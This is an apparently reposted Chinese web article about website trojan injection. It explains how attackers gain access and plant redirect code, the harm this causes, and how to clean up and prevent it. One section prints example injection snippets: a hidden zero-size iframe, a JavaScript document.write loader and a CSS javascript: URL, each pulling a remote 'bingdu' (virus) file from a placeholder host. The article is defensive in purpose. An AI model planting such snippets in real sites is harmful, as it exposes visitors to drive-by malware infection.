邀朋友种豆,一起分享吧
喜欢购买正品行货?那就去品牌街

网站挂马与快速恢复方法

来自:种豆 时间:2017-12-29 阅读:633次 原文链接

什么是网站挂马?

  所谓的网站挂马,就是黑客通过非正规手段(获取网站管理员账号或ftp密码或利用漏洞)篡改网站页面或跳转网页。跳转到黑客指定的HTML网页木马,然后通过你电脑本身的漏洞攻破你的系统,从而在指定地点隐藏下载木马并运行!    网站获取网站管理员账号通常有以下方法:网站程序0day,SQL注入,扫描网站敏感文件,利用服务器漏洞。    黑客获取管理员账号后登陆网站后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。

网页被挂马有哪些危害?

    网页被挂马后,常会对用户群及网站主造成极大的危害,譬如:    1.网站失去信誉,搜索引擎会对被挂马的网站做降权处理,丢失大量客户。    2.大型网站被挂马,这些网站的用户可能会沦为黑客的肉鸡,从而骗取用户的钱财。    3.盗取游戏网站的游戏账号,从而盗取装备及游戏资产。    4.访问被挂马的用户可能会感染木马病毒,以至于丢失宝贵文件资料和账号密码。

网站被通过植入iframe挂马的几种方法

    1.网页源代码中直接插入了iframe,如:    <iframe src=http://www.baidu/bingdu.html width=0 height=0></iframe>    2.通过js文件挂马,黑客将以下代码存为一个XXX.js的文件,从而将该文件上传到网站目录下:  document.write("< iframe  width='0' height='0'  src='http //www.baidu/bingdu.htm'></iframe>");  则JS挂马代码为  <script language=javascript src=xxx.js></script>  3.通过css挂马,如  body {  background-image: url('javascript:document.write("<script  src=http: //www.baidu/bingdu.js></script>")')}

网站挂马的具体恢复措施

  1.整站被挂马,最快速的恢复方法是,除开数据库、上传目录之外,替换掉其他所有文件  2.仔细检查网站上传目录存放的文件,很多木马伪装成图片保存在上传目录,你直接把上传文件夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除;  3.数据库里面存在木马,则把数据库的木马代码清除!可以采用查找替换  4.如果网站源文件没有,则需要FTP下载网站文件,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查!

网站挂马的预防措施

    网站可以通过定期检查,设置复杂密码,设定目录权限等方式预防被挂马,具体可参考《网站挂马的预防措施20条》
 
关于种豆 ┊ 联系我们 ┊ 免责声明 ┊ 发帖须知 ┊ 请提意见 ┊ 站点地图
本站为个人爱好兴趣分享网站,不代表本人观点,如有侵权请联系QQ3371650278进行处理
sowsoy.com 版权所有 Copyright©2010-2020 浙ICP备10212932号
Email:sowsoy#hotmail.com